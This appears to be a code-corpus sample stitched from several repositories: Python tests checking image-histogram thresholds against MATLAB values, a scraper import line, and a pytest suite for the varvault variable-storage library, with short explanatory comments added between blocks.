    Tests that thresholds calculated for images by the slide_circle_data
    function in the matlab PIE code are close to those calculated by
    PIE.adaptive_threshold._DataSlidingCircleThresholdMethod
    '''
    @classmethod
    def setUpClass(cls):
        # set relative fold tolerance for comparison of expected and
        # actual thresholds
        cls.rel_tolerance = 0.3

    def _get_threshold(self, im_name):
        '''
        Opens the histogram file (calculated in matlab) corresponding to
        im_name, reads in the log histogram, and calculates and returns
        the threshold via
        PIE.adaptive_threshold._DataSlidingCircleThresholdMethod
        '''
        im_path = os.path.join('tests', 'test_ims',
                               (im_name + '_best_hist.csv'))
        hist_data = np.loadtxt(im_path, delimiter=',')
        x_pos = hist_data[0]
        ln_hist = hist_data[1]
        threshold_method = \
            adaptive_threshold._DataSlidingCircleThresholdMethod(x_pos, ln_hist)
        threshold = threshold_method.get_threshold()
        # print('\n')
        # p = threshold_method.plot()
        # print(p)
        # print(im_name)
        # print(threshold)
        return threshold

    def test_xy01_08ms_3702(self):
        # matlab threshold: 12608
        test_threshold = self._get_threshold('xy01_08ms_3702')
        expected_threshold = 9312
        assert_allclose(expected_threshold, test_threshold,
                        rtol=self.rel_tolerance)

    # def test_t10xy0320(self):
    #     '''
    #     Here, matlab threshold pretty far off-base, but even if we use
    #     gaussian threshold instead as the 'expected' value, data-based
    #     sliding circle still does a poor job
    #     '''
    #     # 5437
    #     test_threshold = self._get_threshold('t10xy0320')
    #     expected_threshold = 3103
    #     assert_allclose(expected_threshold, test_threshold,
    #                     rtol=self.rel_tolerance)

    def test_xy01_14ms_3702(self):
        # matlab threshold: 13360
        test_threshold = self._get_threshold('xy01_14ms_3702')
        expected_threshold = 13360
        assert_allclose(expected_threshold, test_threshold,
                        rtol=self.rel_tolerance)

    def test_t02xy0225(self):
        # matlab threshold: 9422.8
        test_threshold = self._get_threshold('t02xy0225')
        expected_threshold = 9024
        assert_allclose(expected_threshold, test_threshold,
                        rtol=self.rel_tolerance)

    def test_t09xy1107(self):
        # matlab threshold: 7141.8
        test_threshold = self._get_threshold('t09xy1107')
        expected_threshold = 7142
        assert_allclose(expected_threshold, test_threshold,
                        rtol=self.rel_tolerance)

class Test_FitSlidingCircleThresholdMethod(unittest.TestCase):
    '''
    Tests that thresholds calculated by the slide_circle_data function
    on the smoothed log histogram in the matlab PIE code are close to
    those calculated by
    PIE.adaptive_threshold._FitSlidingCircleThresholdMethod
    '''
    @classmethod
    def setUpClass(cls):
        # set relative fold tolerance for comparison of expected and
        # actual thresholds
        cls.rel_tolerance = 0.3

    def _get_threshold(self, im_name):
        '''
        Opens the histogram file (calculated in matlab) corresponding to
        im_name, reads in the smoothed log histogram, and calculates and
        returns the threshold via
        PIE.adaptive_threshold._FitSlidingCircleThresholdMethod
        '''
        im_path = os.path.join('tests', 'test_ims',
                               (im_name + '_best_hist.csv'))
        hist_data = np.loadtxt(im_path, delimiter=',')
        x_pos = hist_data[0]
        ln_hist_smooth = hist_data[2]
        threshold_method = \
            adaptive_threshold._FitSlidingCircleThresholdMethod(x_pos, ln_hist_smooth)
        threshold = threshold_method.get_threshold()
        # print('\n')
        # print(threshold_method._x_centers)
        # print(threshold_method._radius)
        # p = threshold_method.plot()
        # print(p)
        # print(im_name)
        # print(threshold)
        return threshold

    def test_xy01_08ms_3702(self):
        # matlab threshold: 9856
        test_threshold = self._get_threshold('xy01_08ms_3702')
        expected_threshold = 9312
        assert_allclose(expected_threshold, test_threshold,
                        rtol=self.rel_tolerance)

    def test_t10xy0320(self):
        '''
        Here, the threshold differs a lot from the one calculated via
        gaussians because the default lower bound is higher than the
        optimal threshold
        '''
        # matlab threshold: 7686.1
        # strangely only fails in python 3, where threshold is estimated as 22533...
        test_threshold = self._get_threshold('t10xy0320')
        expected_threshold = 7686
        assert_allclose(expected_threshold, test_threshold,
                        rtol=self.rel_tolerance)

    def test_xy01_14ms_3702(self):
        # matlab threshold: 12579
        test_threshold = self._get_threshold('xy01_14ms_3702')
        expected_threshold = 13360
        assert_allclose(expected_threshold, test_threshold,
                        rtol=self.rel_tolerance)

    def test_t02xy0225(self):
        # matlab threshold: 10507
        test_threshold = self._get_threshold('t02xy0225')
        expected_threshold = 9024
        assert_allclose(expected_threshold, test_threshold,
                        rtol=self.rel_tolerance)

    def test_t09xy1107(self):
        # matlab threshold: 7931
        test_threshold = self._get_threshold('t09xy1107')
        expected_threshold = 7142
        assert_allclose(expected_threshold, test_threshold,
                        rtol=self.rel_tolerance)
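The `_get_threshold` helpers above all assume the same `<im_name>_best_hist.csv` layout: row 0 holds the histogram x positions, row 1 the log histogram, and row 2 the smoothed log histogram. The tests load it with `np.loadtxt`; the same step can be sketched with only the standard library (the file path here is hypothetical):

```python
import csv


def load_hist_rows(csv_path):
    """Read a 3-row histogram CSV: x positions, ln(hist), smoothed ln(hist).

    Mirrors the layout the tests assume for '<im_name>_best_hist.csv';
    a stdlib stand-in for the np.loadtxt call the tests actually use.
    """
    with open(csv_path, newline="") as f:
        rows = [[float(v) for v in row] for row in csv.reader(f)]
    assert len(rows) >= 3, "expected x positions, ln hist, and smoothed ln hist rows"
    x_pos, ln_hist, ln_hist_smooth = rows[0], rows[1], rows[2]
    return x_pos, ln_hist, ln_hist_smooth
```

Unlike `np.loadtxt`, this returns plain lists, which is enough to feed a threshold method that only iterates over the values.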


# --- scrapers/facebook/__init__.py (nprapps/graeae, MIT license) ---
from scraper import FacebookScraper


# --- tests/test_vault.py (data-ductus/varvault, Apache-2.0 license) ---
import os
import sys
import json
import pytest
import logging
import tempfile
DIR = os.path.dirname(os.path.realpath(__file__))
path = f"{os.path.dirname(DIR)}"
temp_path = [path]
temp_path.extend(sys.path)
sys.path = temp_path
import varvault
logger = logging.getLogger("pytest")
vault_file_new = f"{DIR}/new-vault.json"
vault_file_new_secondary = f"{DIR}/new-vault-secondary.json"
existing_vault = f"{DIR}/existing-vault.json"
faulty_existing_vault = f"{DIR}/faulty-existing-vault.json"
faulty_vault_key_missmatch = f"{DIR}/faulty-vault-key-missmatch.json"

class Keyring(varvault.Keyring):
    key_valid_type_is_str = varvault.Key("key_valid_type_is_str", valid_type=str)
    key_valid_type_is_int = varvault.Key("key_valid_type_is_int", valid_type=int)


class VaultStructDict(varvault.VaultStructDictBase):
    def __init__(self, value_1: str, value_2: int, **kwargs):
        super(VaultStructDict, self).__init__(**kwargs)
        assert isinstance(value_1, str)
        assert isinstance(value_2, int)
        self.value_1 = value_1
        self.value_2 = value_2

    def internal_function(self):
        pass

    @classmethod
    def build_from_vault_key(cls, vault_key, vault_value):
        obj = VaultStructDict(**vault_value)
        return obj

class VaultStructList(varvault.VaultStructListBase):
    def __init__(self, value_1: str, value_2: int, *args):
        super(VaultStructList, self).__init__(*args)
        assert isinstance(value_1, str)
        assert isinstance(value_2, int)
        self.value_1 = value_1
        self.value_2 = value_2
        self.extend([value_1, value_2])

    def internal_function(self):
        pass

    @classmethod
    def build_from_vault_key(cls, vault_key, vault_value):
        obj = VaultStructList(*vault_value)
        return obj


class VaultStructString(varvault.VaultStructStringBase):
    def __new__(cls, string_value, extra_value, *args, **kwargs):
        assert isinstance(string_value, str)
        obj = super().__new__(cls, string_value)
        obj.string_value = string_value
        obj.extra_value = extra_value
        return obj

    def internal_function(self):
        pass

    @classmethod
    def build_from_vault_key(cls, vault_key, vault_value):
        obj = VaultStructString(string_value=vault_value, extra_value="extra_value-cannot-possibly-be-saved-to-a-string")
        return obj

class VaultStructFloat(varvault.VaultStructFloatBase):
    def __new__(cls, float_value, extra_value, *args, **kwargs):
        assert isinstance(float_value, float)
        obj = super().__new__(cls, float_value)
        obj.float_value = float_value
        obj.extra_value = extra_value
        return obj

    def internal_function(self):
        pass

    @classmethod
    def build_from_vault_key(cls, vault_key, vault_value):
        obj = VaultStructFloat(float_value=vault_value, extra_value="extra_value-cannot-possibly-be-saved-to-a-float")
        return obj


class VaultStructInt(varvault.VaultStructIntBase):
    def __new__(cls, int_value, extra_value, *args, **kwargs):
        assert isinstance(int_value, int)
        obj = super().__new__(cls, int_value)
        obj.int_value = int_value
        obj.extra_value = extra_value
        return obj

    def internal_function(self):
        pass

    @classmethod
    def build_from_vault_key(cls, vault_key, vault_value):
        obj = VaultStructInt(int_value=vault_value, extra_value="extra_value-cannot-possibly-be-saved-to-an-int")
        return obj


class KeyringVaultStruct(varvault.Keyring):
    key_vault_struct_dict = varvault.Key("key_vault_struct_dict", valid_type=VaultStructDict)
    key_vault_struct_list = varvault.Key("key_vault_struct_list", valid_type=VaultStructList)
    key_vault_struct_string = varvault.Key("key_vault_struct_string", valid_type=VaultStructString)
    key_vault_struct_float = varvault.Key("key_vault_struct_float", valid_type=VaultStructFloat)
    key_vault_struct_int = varvault.Key("key_vault_struct_int", valid_type=VaultStructInt)
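The `VaultStruct*Base` subclasses above wrap built-in types while carrying extra attributes, which is what lets a plain JSON value round-trip back into a rich object via `build_from_vault_key`. The underlying Python pattern — subclassing an immutable built-in through `__new__` — can be shown with the standard library alone (class and method names here are illustrative, not varvault's API):

```python
class TaggedInt(int):
    """An int subclass carrying an extra attribute.

    The attribute is attached in __new__ because int is immutable, the
    same trick the VaultStructIntBase subclass above relies on.
    """

    def __new__(cls, int_value, extra_value):
        obj = super().__new__(cls, int_value)
        obj.extra_value = extra_value
        return obj

    @classmethod
    def build_from_plain_value(cls, value):
        # Rebuild from a bare int, analogous to build_from_vault_key:
        # the extra attribute cannot survive serialization to plain JSON,
        # so it has to be reconstructed here.
        return cls(value, extra_value="rebuilt")
```

Because `TaggedInt` *is* an int, it participates in arithmetic and JSON serialization like any other int; only the extra attribute is lost on the way to disk, which is why the rebuild hook exists.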

class TestVault:
    @classmethod
    def setup_class(cls):
        logger.info(tempfile.tempdir)
        tempfile.tempdir = "/tmp" if sys.platform == "darwin" or sys.platform == "linux" else tempfile.gettempdir()
        logger.info(tempfile.tempdir)

    def setup_method(self):
        try:
            os.remove(vault_file_new)
        except OSError:
            pass
        try:
            os.remove(vault_file_new_secondary)
        except OSError:
            pass

    def test_assert_true(self):
        assert True
        logger.info(DIR)

    def test_create_new_vault(self):
        vault = varvault.create_vault(Keyring, "vault", varvault_vault_filename_to=vault_file_new, varvault_filehandler_class=varvault.FileTypes.JSON)

        @vault.vaulter(return_keys=Keyring.key_valid_type_is_str)
        def _set_valid():
            return "valid-key"
        _set_valid()
        assert vault.get(Keyring.key_valid_type_is_str) == "valid-key"

        @vault.vaulter(return_keys=Keyring.key_valid_type_is_int)
        def _set_invalid():
            return "invalid-key; must be int"
        try:
            _set_invalid()
            pytest.fail(f"Somehow managed to set an invalid value to key {Keyring.key_valid_type_is_int} (valid type: {Keyring.key_valid_type_is_int.valid_type})")
        except Exception as e:
            assert "Key 'key_valid_type_is_int' requires type to be '<class 'int'>'" in str(e), f"Unexpected error: {e}"
            logger.info("Expected error received; test passed")
        assert Keyring.key_valid_type_is_int not in vault

    def test_put(self):
        vault = varvault.create_vault(Keyring, "vault", varvault_vault_filename_to=vault_file_new, varvault_filehandler_class=varvault.FileTypes.JSON)
        mv = varvault.MiniVault({Keyring.key_valid_type_is_str: "value", Keyring.key_valid_type_is_int: 1})
        vault.vault.put(mv)
        assert Keyring.key_valid_type_is_str in vault
        assert Keyring.key_valid_type_is_int in vault

        vault = varvault.create_vault(Keyring, "vault", varvault_vault_filename_to=vault_file_new, varvault_filehandler_class=varvault.FileTypes.JSON)
        vault.vault.put(Keyring.key_valid_type_is_str, "value")
        assert Keyring.key_valid_type_is_str in vault

    def test_create_from_vault(self):
        vault = varvault.from_vault(Keyring, "from-vault", existing_vault, varvault.FileTypes.JSON)
        assert Keyring.key_valid_type_is_str in vault
        assert Keyring.key_valid_type_is_int in vault
        assert vault.get(Keyring.key_valid_type_is_str) == "valid"
        assert vault.get(Keyring.key_valid_type_is_int) == 1
        d = json.load(open(existing_vault))
        assert Keyring.key_valid_type_is_str in d and Keyring.key_valid_type_is_int in d, "It appears that loading from the vault file has cleared the vault file unintentionally. This is very bad"
    def test_load_from_one_write_to_another(self):
        vault = varvault.from_vault(Keyring, "from-vault", existing_vault, varvault.FileTypes.JSON, varvault_vault_filename_to=vault_file_new)

        @vault.vaulter(varvault.VaultFlags.permit_modifications(), input_keys=Keyring.key_valid_type_is_str, return_keys=Keyring.key_valid_type_is_str)
        def mod(**kwargs):
            key_valid_type_is_str = kwargs.get(Keyring.key_valid_type_is_str)
            assert key_valid_type_is_str == "valid"
            modded = "modded"
            return modded
        mod()
        assert vault.get(Keyring.key_valid_type_is_str) == "modded"
        assert json.load(open(vault_file_new)).get(Keyring.key_valid_type_is_str) == "modded", f"The value for {Keyring.key_valid_type_is_str} in vault_filename_to is not the expected"
        assert json.load(open(existing_vault)).get(Keyring.key_valid_type_is_str) == "valid", f"The value for {Keyring.key_valid_type_is_str} in vault_filename_from has changed. This is very bad"

    def test_create_from_vault_no_valid_type_in_key(self):
        class KeyringTemp(varvault.Keyring):
            key_valid_type_is_str = varvault.Key("key_valid_type_is_str")
            key_valid_type_is_int = varvault.Key("key_valid_type_is_int")
        vault = varvault.from_vault(KeyringTemp, "from-vault", existing_vault, varvault.FileTypes.JSON, varvault_vault_filename_to=vault_file_new)

    def test_permit_modifications(self):
        vault = varvault.create_vault(Keyring, "vault", varvault_vault_filename_to=vault_file_new, varvault_filehandler_class=varvault.FileTypes.JSON)
        vault.insert(Keyring.key_valid_type_is_str, "valid")
        try:
            @vault.vaulter(return_keys=Keyring.key_valid_type_is_str)
            def _set():
                return "new-value-that-should-not-go-in"
            _set()
            pytest.fail("Managed to set a new value to an existing key while modifications are not permitted")
        except Exception as e:
            logger.info("Expected error received; test passed")
        assert vault.get(Keyring.key_valid_type_is_str) == "valid", f"Value for {Keyring.key_valid_type_is_str} is not what it should be"

        @vault.vaulter(varvault.VaultFlags.permit_modifications(), return_keys=Keyring.key_valid_type_is_str)
        def _set():
            return "new-modified-value"
        _set()
        assert vault.get(Keyring.key_valid_type_is_str) == "new-modified-value", f"Value for {Keyring.key_valid_type_is_str} is not what it should be"

        new_vault = varvault.from_vault(Keyring, "from-vault", vault_file_new, varvault.FileTypes.JSON, varvault.VaultFlags.permit_modifications())

        @new_vault.vaulter(return_keys=Keyring.key_valid_type_is_str)
        def _set():
            return "new-modified-value-gen-2"
        _set()
        assert new_vault.get(Keyring.key_valid_type_is_str) == "new-modified-value-gen-2", f"Value for {Keyring.key_valid_type_is_str} is not what it should be"
    def test_create_readonly_vault(self):
        vault = varvault.from_vault(Keyring, "from-vault", existing_vault, varvault.FileTypes.JSON, varvault.VaultFlags.file_is_read_only())
        try:
            vault.insert(Keyring.key_valid_type_is_int, 1)
            pytest.fail("Insert: Somehow managed to insert a value into a vault that is supposed to be read-only")
        except Exception as e:
            logger.info(f"Expected error received; test passed: {e}")
        try:
            @vault.vaulter(return_keys=Keyring.key_valid_type_is_int)
            def _set():
                return 1
            _set()
            pytest.fail("Vaulter: Somehow managed to insert a value into a vault that is supposed to be read-only")
        except Exception as e:
            logger.info(f"Expected error received; test passed: {e}")

    def test_read_only_key_not_in_keyring(self):
        json.dump({Keyring.key_valid_type_is_str: "valid", Keyring.key_valid_type_is_int: 1, "temp": "this-should-not-be-in-the-vault"}, open(vault_file_new, "w"))
        vault = varvault.from_vault(Keyring, "from-vault", vault_file_new, varvault.FileTypes.JSON, varvault.VaultFlags.file_is_read_only())
        assert varvault.Key("temp") not in vault, "Vault contains a key that should not be in the vault since it doesn't exist in the keyring"
        assert Keyring.key_valid_type_is_str in vault
        assert Keyring.key_valid_type_is_int in vault

    def test_insert_nonexistent_key(self):
        vault = varvault.create_vault(Keyring, "vault", varvault_vault_filename_to=vault_file_new, varvault_filehandler_class=varvault.FileTypes.JSON)
        temp_key = varvault.Key("temp_key")
        try:
            vault.insert(temp_key, "this-should-not-go-in")
            pytest.fail("Somehow managed to insert a non-existent key into a vault that should not permit this")
        except Exception as e:
            logger.info(f"Expected error received; test passed: {e}")

    def test_create_from_faulty_vault(self):
        this_key_doesnt_exist_in_keyring = varvault.Key("this_key_doesnt_exist_in_keyring", valid_type=str)
        try:
            vault = varvault.from_vault(Keyring, "from-vault", faulty_existing_vault, varvault.FileTypes.JSON)
            pytest.fail("Managed to create a vault from a file that should be faulty")
        except Exception as e:
            logger.info(f"Expected error received; test passed: {e}")
        try:
            vault = varvault.from_vault(Keyring, "from-vault", faulty_vault_key_missmatch, varvault.FileTypes.JSON)
            pytest.fail("Managed to create a vault from a file with a key not in keyring, and ignore_keys_not_in_keyring is False")
        except Exception as e:
            logger.info(f"Expected error received; test passed: {e}")

        vault = varvault.from_vault(Keyring, "from-vault", faulty_vault_key_missmatch, varvault.FileTypes.JSON, varvault.VaultFlags.ignore_keys_not_in_keyring(), varvault_vault_filename_to=vault_file_new)
        assert this_key_doesnt_exist_in_keyring not in vault, f"Key {this_key_doesnt_exist_in_keyring} was found in the vault when it shouldn't be"

        vault = varvault.from_vault(Keyring, "from-vault", faulty_vault_key_missmatch, varvault.FileTypes.JSON,
                                    varvault_vault_filename_to=vault_file_new,
                                    this_key_doesnt_exist_in_keyring=this_key_doesnt_exist_in_keyring)
        assert this_key_doesnt_exist_in_keyring in vault, f"Key {this_key_doesnt_exist_in_keyring} was not found in the vault when it should be added as an extra key"
    def test_insert_type_validation(self):
        vault = varvault.create_vault(Keyring, "vault", varvault_vault_filename_to=vault_file_new, varvault_filehandler_class=varvault.FileTypes.JSON)
        try:
            vault.insert(Keyring.key_valid_type_is_int, "this-should-not-work")
            assert False, "Somehow managed to insert a value for a key that should not work"
        except Exception as e:
            logger.info(f"Expected error received; test passed: {e}")

    def test_vault_struct_dict(self):
        vault = varvault.create_vault(KeyringVaultStruct, "vault", varvault_vault_filename_to=vault_file_new, varvault_filehandler_class=varvault.FileTypes.JSON)

        @vault.vaulter(return_keys=KeyringVaultStruct.key_vault_struct_dict)
        def _set():
            return VaultStructDict("v1", 1)
        _set()
        assert isinstance(vault.get(KeyringVaultStruct.key_vault_struct_dict), VaultStructDict)
        logger.info(vault.get(KeyringVaultStruct.key_vault_struct_dict))

        from_vault = varvault.from_vault(KeyringVaultStruct, "from-vault", vault_file_new, varvault.FileTypes.JSON)
        assert isinstance(from_vault.get(KeyringVaultStruct.key_vault_struct_dict), VaultStructDict)
        assert hasattr(from_vault.get(KeyringVaultStruct.key_vault_struct_dict), "internal_function")
        assert hasattr(from_vault.get(KeyringVaultStruct.key_vault_struct_dict), "value_1")
        assert hasattr(from_vault.get(KeyringVaultStruct.key_vault_struct_dict), "value_2")

    def test_vault_struct_list(self):
        vault = varvault.create_vault(KeyringVaultStruct, "vault", varvault_vault_filename_to=vault_file_new, varvault_filehandler_class=varvault.FileTypes.JSON)

        @vault.vaulter(return_keys=KeyringVaultStruct.key_vault_struct_list)
        def _set():
            return VaultStructList("v1", 1)
        _set()
        assert isinstance(vault.get(KeyringVaultStruct.key_vault_struct_list), VaultStructList)
        logger.info(vault.get(KeyringVaultStruct.key_vault_struct_list))

        from_vault = varvault.from_vault(KeyringVaultStruct, "from-vault", vault_file_new, varvault.FileTypes.JSON)
        assert isinstance(from_vault.get(KeyringVaultStruct.key_vault_struct_list), VaultStructList)
        assert hasattr(from_vault.get(KeyringVaultStruct.key_vault_struct_list), "internal_function")
        assert hasattr(from_vault.get(KeyringVaultStruct.key_vault_struct_list), "value_1")
        assert hasattr(from_vault.get(KeyringVaultStruct.key_vault_struct_list), "value_2")

    def test_vault_struct_string(self):
        vault = varvault.create_vault(KeyringVaultStruct, "vault", varvault_vault_filename_to=vault_file_new, varvault_filehandler_class=varvault.FileTypes.JSON)

        @vault.vaulter(return_keys=KeyringVaultStruct.key_vault_struct_string)
        def _set():
            return VaultStructString("string-value", "extra-value-here")
        _set()
        assert isinstance(vault.get(KeyringVaultStruct.key_vault_struct_string), VaultStructString)
        logger.info(vault.get(KeyringVaultStruct.key_vault_struct_string))

        from_vault = varvault.from_vault(KeyringVaultStruct, "from-vault", vault_file_new, varvault.FileTypes.JSON)
        assert isinstance(from_vault.get(KeyringVaultStruct.key_vault_struct_string), VaultStructString)
        assert hasattr(from_vault.get(KeyringVaultStruct.key_vault_struct_string), "internal_function")
        assert hasattr(from_vault.get(KeyringVaultStruct.key_vault_struct_string), "string_value")

    def test_vault_struct_float(self):
        vault = varvault.create_vault(KeyringVaultStruct, "vault", varvault_vault_filename_to=vault_file_new, varvault_filehandler_class=varvault.FileTypes.JSON)

        @vault.vaulter(return_keys=KeyringVaultStruct.key_vault_struct_float)
        def _set():
            return VaultStructFloat(3.14, "extra-value-here")
        _set()
        assert isinstance(vault.get(KeyringVaultStruct.key_vault_struct_float), VaultStructFloat)
        logger.info(vault.get(KeyringVaultStruct.key_vault_struct_float))

        from_vault = varvault.from_vault(KeyringVaultStruct, "from-vault", vault_file_new, varvault.FileTypes.JSON)
        assert isinstance(from_vault.get(KeyringVaultStruct.key_vault_struct_float), VaultStructFloat)
        assert hasattr(from_vault.get(KeyringVaultStruct.key_vault_struct_float), "internal_function")
        assert hasattr(from_vault.get(KeyringVaultStruct.key_vault_struct_float), "float_value")

    def test_vault_struct_int(self):
        vault = varvault.create_vault(KeyringVaultStruct, "vault", varvault_vault_filename_to=vault_file_new, varvault_filehandler_class=varvault.FileTypes.JSON)

        @vault.vaulter(return_keys=KeyringVaultStruct.key_vault_struct_int)
        def _set():
            return VaultStructInt(1, "extra-value-here")
        _set()
        assert isinstance(vault.get(KeyringVaultStruct.key_vault_struct_int), VaultStructInt)
        logger.info(vault.get(KeyringVaultStruct.key_vault_struct_int))

        from_vault = varvault.from_vault(KeyringVaultStruct, "from-vault", vault_file_new, varvault.FileTypes.JSON)
        assert isinstance(from_vault.get(KeyringVaultStruct.key_vault_struct_int), VaultStructInt)
        assert hasattr(from_vault.get(KeyringVaultStruct.key_vault_struct_int), "internal_function")
        assert hasattr(from_vault.get(KeyringVaultStruct.key_vault_struct_int), "int_value")
    def test_live_update_vault(self):
        vault_new = varvault.create_vault(Keyring, "vault", varvault_vault_filename_to=vault_file_new, varvault_filehandler_class=varvault.FileTypes.JSON)
        vault_from = varvault.from_vault(Keyring, "vault-from", vault_file_new, varvault.FileTypes.JSON, varvault.VaultFlags.live_update(), varvault.VaultFlags.file_is_read_only())

        @vault_new.vaulter(return_keys=Keyring.key_valid_type_is_str)
        def _set():
            return "valid"
        _set()
        assert Keyring.key_valid_type_is_str not in vault_from, f"{Keyring.key_valid_type_is_str} already in the vault; This should not be the case"

        @vault_from.vaulter(input_keys=Keyring.key_valid_type_is_str)
        def _get(**kwargs):
            v = kwargs.get(Keyring.key_valid_type_is_str)
            assert v == "valid", f"Value {v} is not correct; Live-update doesn't work"
        _get()

    def test_live_update_on_main_vault(self):
        vault = varvault.create_vault(Keyring, "vault", varvault.VaultFlags.live_update(), varvault_vault_filename_to=vault_file_new, varvault_filehandler_class=varvault.FileTypes.JSON)

        @vault.vaulter(return_keys=Keyring.key_valid_type_is_str)
        def _set():
            return "valid"
        _set()
        assert Keyring.key_valid_type_is_int not in vault, f"{Keyring.key_valid_type_is_int} already in vault; This should not be possible"
        vault_data = json.load(open(vault_file_new))
        vault_data[Keyring.key_valid_type_is_int] = 1
        json.dump(vault_data, open(vault_file_new, "w"), indent=2)
        assert Keyring.key_valid_type_is_int not in vault, f"{Keyring.key_valid_type_is_int} already in vault; This should not be possible"

        @vault.vaulter(input_keys=Keyring.key_valid_type_is_int)
        def _get(**kwargs):
            key_valid_type_is_int = kwargs.get(Keyring.key_valid_type_is_int)
            assert key_valid_type_is_int == 1
        _get()
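The behavior the two live-update tests rely on — a vault only notices an external edit to its backing file when a key is actually requested — can be sketched with a stdlib JSON store that reloads on read whenever the file's mtime changes (class and method names here are illustrative, not varvault's implementation):

```python
import json
import os


class LiveJsonStore:
    """Reload a JSON file on read whenever its mtime changes.

    A rough stdlib sketch of 'live update' semantics: writes made to the
    file by another party become visible only on the next get().
    """

    def __init__(self, path):
        self.path = path
        self._mtime = None
        self._data = {}

    def get(self, key, default=None):
        mtime = os.path.getmtime(self.path)
        if mtime != self._mtime:
            # File changed on disk since the last read; reload it.
            with open(self.path) as f:
                self._data = json.load(f)
            self._mtime = mtime
        return self._data.get(key, default)
```

Note the mtime comparison only detects changes at the filesystem's timestamp resolution; a real implementation would likely also compare content or use file locking.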
    def test_clean_return_keys(self):
        vault_new = varvault.create_vault(Keyring, "vault", varvault_vault_filename_to=vault_file_new, varvault_filehandler_class=varvault.FileTypes.JSON)

        @vault_new.vaulter(return_keys=Keyring.key_valid_type_is_str)
        def _set():
            return "valid"
        _set()
        assert vault_new.get(Keyring.key_valid_type_is_str) == "valid"

        @vault_new.vaulter(varvault.VaultFlags.clean_return_keys(), return_keys=Keyring.key_valid_type_is_str)
        def _clean():
            return
        _clean()
        assert Keyring.key_valid_type_is_str in vault_new, f"No {Keyring.key_valid_type_is_str} in vault"
        assert vault_new.get(Keyring.key_valid_type_is_str) == "", f"Key {Keyring.key_valid_type_is_str} is not an empty string; {vault_new.get(Keyring.key_valid_type_is_str)}"

    def test_extra_keys(self):
        extra_key1 = varvault.Key("extra_key1", valid_type=dict)
        vault_new = varvault.create_vault(Keyring, "vault", varvault_vault_filename_to=vault_file_new, varvault_filehandler_class=varvault.FileTypes.JSON, extra_key1=varvault.Key("extra_key1", valid_type=dict))

        @vault_new.vaulter(return_keys=extra_key1)
        def _set_invalid():
            return [1, 2, 3]
        try:
            _set_invalid()
            pytest.fail("Unexpectedly managed to set an invalid value to an extra key")
        except Exception as e:
            logger.info(f"Expected error received; test passed: {e}")

        @vault_new.vaulter(return_keys=extra_key1)
        def _set_valid():
            return {"a": 1, "b": 2, "c": 3}
        _set_valid()

        @vault_new.vaulter(varvault.VaultFlags.clean_return_keys(), return_keys=extra_key1)
        def _clean():
            return
        _clean()
        assert vault_new.get(extra_key1) == {}

    def test_return_tuple_is_single_item(self):
        tuple_item = varvault.Key("tuple_item", valid_type=tuple)
        vault = varvault.create_vault(Keyring, "vault", varvault_vault_filename_to=vault_file_new, varvault_filehandler_class=varvault.FileTypes.JSON, tuple_item=tuple_item)

        @vault.vaulter(varvault.VaultFlags.return_tuple_is_single_item(), return_keys=tuple_item)
        def _set():
            return 1, 2, 3
        _set()
        assert tuple_item in vault, f"Flag: No {tuple_item} found in vault"
        assert vault.get(tuple_item) == (1, 2, 3), "Flag: mismatch"

        vault = varvault.create_vault(Keyring, "vault", varvault_vault_filename_to=vault_file_new, varvault_filehandler_class=varvault.FileTypes.JSON, tuple_item=tuple_item)

        @vault.vaulter(return_keys=tuple_item)
        def _set():
            return 1, 2, 3
        _set()
        assert tuple_item in vault, f"No flag: No {tuple_item} found in vault"
        assert vault.get(tuple_item) == (1, 2, 3), "No flag: mismatch"

    def test_split_return_keys(self):
        vault = varvault.create_vault(Keyring, "vault", varvault_vault_filename_to=vault_file_new, varvault_filehandler_class=varvault.FileTypes.JSON)
        vault_secondary = varvault.create_vault(Keyring, "vault-secondary", varvault_vault_filename_to=vault_file_new_secondary, varvault_filehandler_class=varvault.FileTypes.JSON)

        @vault.vaulter(varvault.VaultFlags.split_return_keys(), return_keys=Keyring.key_valid_type_is_str)
        @vault_secondary.vaulter(varvault.VaultFlags.split_return_keys(), return_keys=Keyring.key_valid_type_is_int)
        def _set():
            return varvault.MiniVault({Keyring.key_valid_type_is_str: "valid", Keyring.key_valid_type_is_int: 1})
        _set()
        assert Keyring.key_valid_type_is_str in vault and Keyring.key_valid_type_is_int not in vault
        assert Keyring.key_valid_type_is_int in vault_secondary and Keyring.key_valid_type_is_str not in vault_secondary
        assert vault.get(Keyring.key_valid_type_is_str) == "valid"
        assert vault_secondary.get(Keyring.key_valid_type_is_int) == 1
    def test_return_key_can_be_missing(self):
        vault = varvault.create_vault(Keyring, "vault", varvault_vault_filename_to=vault_file_new, varvault_filehandler_class=varvault.FileTypes.JSON)

        @vault.vaulter(return_keys=(Keyring.key_valid_type_is_str, Keyring.key_valid_type_is_int))
        def _set_failed():
            return "valid"
        try:
            # Should fail saying that the number of returned items does not match the number of keys
            _set_failed()
            pytest.fail("Managed to set a single variable to two keys or something")
        except Exception:
            logger.info("Expected error received; test passed")

        @vault.vaulter(varvault.VaultFlags.return_key_can_be_missing(), return_keys=(Keyring.key_valid_type_is_str, Keyring.key_valid_type_is_int))
        def _set_failed_again():
            return "valid"
        try:
            _set_failed_again()
            pytest.fail(f"Managed to set a single variable when {varvault.VaultFlags.return_key_can_be_missing()} is defined; "
                        f"Should have failed saying return var must be of type {varvault.MiniVault}")
        except Exception:
            logger.info("Expected error received; test passed")

        @vault.vaulter(varvault.VaultFlags.return_key_can_be_missing(), return_keys=(Keyring.key_valid_type_is_str, Keyring.key_valid_type_is_int))
        def _set_working():
            return varvault.MiniVault({Keyring.key_valid_type_is_str: "valid"})
        _set_working()
        assert Keyring.key_valid_type_is_str in vault
        assert Keyring.key_valid_type_is_int not in vault
        assert vault.get(Keyring.key_valid_type_is_str) == "valid"

    def test_validate_types_in_minivault_return_values(self):
        vault = varvault.create_vault(Keyring, "vault", varvault_vault_filename_to=vault_file_new, varvault_filehandler_class=varvault.FileTypes.JSON)

        @vault.vaulter(return_keys=(Keyring.key_valid_type_is_str, Keyring.key_valid_type_is_int))
        def _set_failed():
            return varvault.MiniVault({Keyring.key_valid_type_is_str: 1, Keyring.key_valid_type_is_int: "invalid"})
        try:
            _set_failed()
            pytest.fail("Managed to set invalid values to the vault by returning them in a minivault.")
        except Exception as e:
            logger.info(f"Expected error received; test passed: {e}")

    def test_validator_decorator(self):
        try:
            @varvault.validator(function_asserts=True, function_returns_bool=True)
            def invalid_decorator_use(value):
                pass
            pytest.fail("Managed to register a validator function that should not be possible to register. Both 'function_asserts' and 'function_returns_bool' should not be possible to set at the same time")
        except SyntaxError as e:
